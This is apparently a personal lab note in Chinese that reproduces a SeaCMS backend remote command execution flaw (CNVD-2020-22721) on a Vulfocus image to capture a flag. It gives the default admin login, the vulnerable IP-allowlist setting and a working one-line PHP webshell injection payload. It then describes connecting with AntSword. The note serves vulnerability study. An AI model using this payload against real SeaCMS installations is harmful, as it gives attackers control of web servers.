注:个人笔记,并不全面,仅供参考。
漏洞环境
海洋CMS是视频类的CMS,是远程命令执行漏洞,漏洞编号为: CNVD-2020-22721
漏洞描述
海洋CMS是一款基于PHP+MYSQL架构的,可跨平台运行的网站内容管理系统。
seacms后台存在命令执行漏洞。攻击者可利用该漏洞获取网站服务器控制权。
开始复现
本次复现是在 VULFOCUS
上进行复现
-
访问镜像地址的80映射端口
-
进入后台登录后台
后台路径:
/manager
后台账密:admin:admin
- 找到后台IP管理设置
- 在允许IP中输入本地回环地址
127.0.0.1
,然后进行抓包
- 结尾添加
webshell
,一句话木马
";eval($_REQUEST[777]);//
- 放包后使用蚁剑进行连接。访问其路径测试链接,然后进行添加
- 打开文件管理,进入
/tmp
目录下成功获得flag